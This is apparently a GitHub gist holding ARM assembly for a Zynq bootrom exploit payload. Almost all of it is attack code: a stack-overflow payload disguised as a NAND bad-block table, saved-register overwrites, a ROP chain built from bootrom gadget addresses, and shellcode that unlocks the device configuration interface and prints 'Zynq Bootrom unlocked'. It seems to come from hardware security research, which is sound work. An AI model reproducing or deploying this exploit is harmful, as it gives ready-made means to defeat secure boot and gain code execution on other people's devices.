Skip to content

Instantly share code, notes, and snippets.

@four0four

four0four/sc.s Secret

Created March 17, 2021 07:32
Show Gist options
  • Save four0four/c204f7f8b0af5c1bc338f669c15b36e0 to your computer and use it in GitHub Desktop.
Save four0four/c204f7f8b0af5c1bc338f669c15b36e0 to your computer and use it in GitHub Desktop.
zynq payload
.section .text
.global _start
.global _payload
.equ sc_len, 516
.equ mio_init, 0x57a4
.equ uart_init, 0x06a0
.equ printf, 0x0a9c4
.equ bxlr, 0x0000015c
.equ dsb_write, 0xB000
.equ uart_boot_init, 0xA1D4
.equ wfe_loop, 0x007E4
.equ memcpy, 0x1430
.equ putch, 0xA7FC
.equ noise, 0xA1D4
.equ tx_fifo, 0xE0001030
.equ ocm_cfg, 0xF8000910
.equ devcfg, 0xF8007000
.equ devcfg_unlock, 0xF8000008
.equ devcfg_key, 0xdf0ddf0d
# trampoline configurables:
.equ relocation_base, 0x60000
.equ shellcode_sp, 0x68000
# entire payload based at sp+8
_start:
_payload:
nop
nop
# "bad block table 0"
.ascii "Bbt0"
_sc_start:
# need this, lazy to fix
nop
nop
movw r0,#0x07c0
movt r0,#0xf800
mov r1, #0xe0
eor r12,r12
movw r12,#mio_init
blx r12
movw r12,#uart_init
blx r12
#wdog
#movw r12,#0x718
#blx r12
#dsb_write(0xf800_0008, 0xdf0ddf0d)
movw r12,#0xB000
movw r0,#8
movt r0,#0xf800
movw r1,#0xdf0d
movt r1,#0xdf0d
blx r12
#wdog
#movw r12,#0x718
#blx r12
#read devcfg
movw r12,#0x1E0C
blx r12
bic r0,r0, #0x800000
orr r0,#0xef
mov r2,r0
movw r12,#0x01E18
blx r12
# grab sctlr:
mov r1, r11
MRC p15, 0, r1 , c1, c0, 0
# grab shadow control reg
movt r11, #0xf800
movw r11, #0x7028
ldr r3, [r11]
# get devconfig:
movw r0, #0x0910
movt r0, #0xf800
movw r12,#0x1E0C
blx r12
mov r2,r0
# get actlr
MRC p15, 0, r1 , c1, c0, 1
# get sctlr
MRC p15, 0, r1 , c1, c0, 0
mov r0, pc
add r0, #banner-.-4
movw r12,#printf
blx r12
#dsb_write(ocm_cfg, 8)
#if we want to edit the IVT, we need to move OCM3 (once relocated!)
#this does mean if we want to debug the bootrom we'd need to remap its RAM
#i think the mmu gives enough granularity?
# .... don't bother right now
# mov r1, #0x8
# movw r0, #0x0910
# movt r0, #0xf800
# movw r12,#0xB000
# blx r12
_loop:
wfe
add pc, #_loop-.-8
_exception:
add r0, pc, #ex_banner-.-8
add r12, pc, #puts-.-8
blx r12
# go back to your loop >:\
add r12, pc, #_loop-.-8
bx r12
puts:
push {r4-r6, lr}
movw r6, #putch
_puts_loop:
ldrb r4, [r0]
cmp r4,#0
popeq {r4-r6, pc}
blx r6
add pc, #_puts_loop-.-8
prompt:
.ascii "> "
banner:
.ascii "Zynq Bootrom unlocked:\n\r"
.ascii "sctlr: 0x%x, devcfg: 0x%x, shadow: 0x%x\n\r\0"
#hd:
#.ascii "%08x\x0a\x0d\0"
ex_banner:
.ascii "exception!\n\r\0"
# pad out stack frame
.rept (sc_len-(.-_payload))
.byte 0
.endr
# restored registers
registers:
.word _r4
.word _r5
.word _r6
.word _r7
.word _r8
.word _r9
.word _r10
.word _r11
.equ _r4, 0x70000
.equ _r5, 0xdead0005
.equ _r6, 0xdead0006
.equ _r7, 0xdead0007
.equ _r8, 0xdead0008
.equ _r9, 0xdead0009
.equ _r10, 0xdead0010
.equ _r11, 0xdead0011
# starting PC (R0 == 0)
# simple ropchain to poke a useful primitive into RAM:
# R0 must be 0
# 0x0000b638: pop {r1, r2, lr}; mul r3, r2, r0; sub r1, r1, r3; bx lr;
.word 0xb638
# r1:
# push {sp}
.word 0xe52dd004
# r2:
.word 0xdeadbeef
# 0x00008a6c: mov r0, #0; str r1, [r4, #0x14]; pop {r4, pc};
.word 0x00008a6c
#r4
.word 0x70004
# R0 must be 0
# 0x0000b638: pop {r1, r2, lr}; mul r3, r2, r0; sub r1, r1, r3; bx lr;
.word 0xb638
# r1:
# pop {pc}
.word 0xe49df004
# r2:
.word 0xdeadbeef
# 0x00008a6c: mov r0, #0; str r1, [r4, #0x14]; pop {r4, pc};
.word 0x00008a6c
#r4
.word 0xdeadbeef
# hit trampoline...
.word 0x70014
# shellcode entrypoint:
trampoline_entry:
add pc,#_sc_start-.-8
#remove that ^ and uncomment
#this v to relocate + enable ivt modification
#add r1,pc,#_sc_start-.
#mov r7,r1
#mov r2,#0x200
#ldr r0,[pc, #reloc_base-.-8]
#mov r12,#memcpy
#blx r12
#ldr r0,[pc, #reloc_base-.-8]
#ldr sp,[pc, #new_sp-.-8]
#bx r0
reloc_base:
.word relocation_base
new_sp:
.word shellcode_sp
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment